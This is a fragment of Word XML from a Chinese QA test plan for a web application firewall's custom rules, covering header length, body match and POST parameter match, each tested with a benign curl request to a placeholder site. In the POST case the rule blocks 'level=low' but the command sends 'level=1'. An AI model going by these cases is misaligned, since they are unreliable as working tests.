                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0FA56383">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56E74D1D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0286380B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点的HTTP请求头长度小于</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">200 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72209DB0">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>curl -vv http://www.site.com/body.html -H “</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Con</w:t>
            </w:r>
            <w:r>
              <w:t>tent-Length: 17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="684E62C5">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28F5FCC6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2AEF1DDC">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="32595A9D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="236A2E29">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7FEEF332">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CF4B902">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6D8CD4F0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B79A9B8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4570D4FB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14A7728F">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76E29576">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4ED1EBCE">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665017F9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="_Toc21077831"/>
      <w:bookmarkStart w:id="175" w:name="_Toc81916135"/>
      <w:bookmarkStart w:id="176" w:name="_Toc1859687701"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Body匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
      <w:bookmarkEnd w:id="175"/>
      <w:bookmarkEnd w:id="176"/>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5051ACB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="29B49901">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="105E8446">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义Body匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5215E8C2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7FE19B69">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0D13F7CB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配Body规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7373B629">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D8F354B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="69FC376A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BE6CE0E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="307B9BD2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点完整的Body字段中包含body</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">=siljxijslnoa </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11158BA0">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>curl http://www.site.com/body.html -d "body=siljxijslnoa"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029A45C8">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4EF1D2B4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="39203F0E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="251FC5BE">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12CE987C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2E2D2493">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14E0E56F">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5C28FAB5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1ABC99A0">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="505E5B07">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ED6F575">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27936225">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B26E6B8">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6DE914">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc81916136"/>
      <w:bookmarkStart w:id="178" w:name="_Toc21077832"/>
      <w:bookmarkStart w:id="179" w:name="_Toc1294192269"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST参数匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
      <w:bookmarkEnd w:id="178"/>
      <w:bookmarkEnd w:id="179"/>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55B395E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="29935BA4">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="152F5EF9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义POST参数匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="251D4F0A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="27B4ACDB">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="59582200">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配POST参数规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="320EFA21">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="706E01D4">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="474921FE">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA9F067">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2178852C">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点的POST参数中包含level</w:t>
            </w:r>
            <w:r>
              <w:t>=low</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2799B616">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>curl http://www.site.com/body.html -d "level=1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EEB404F">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5C49D840">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="039E9F41">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="77503D3A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2CCAB97E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="17F9E499">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
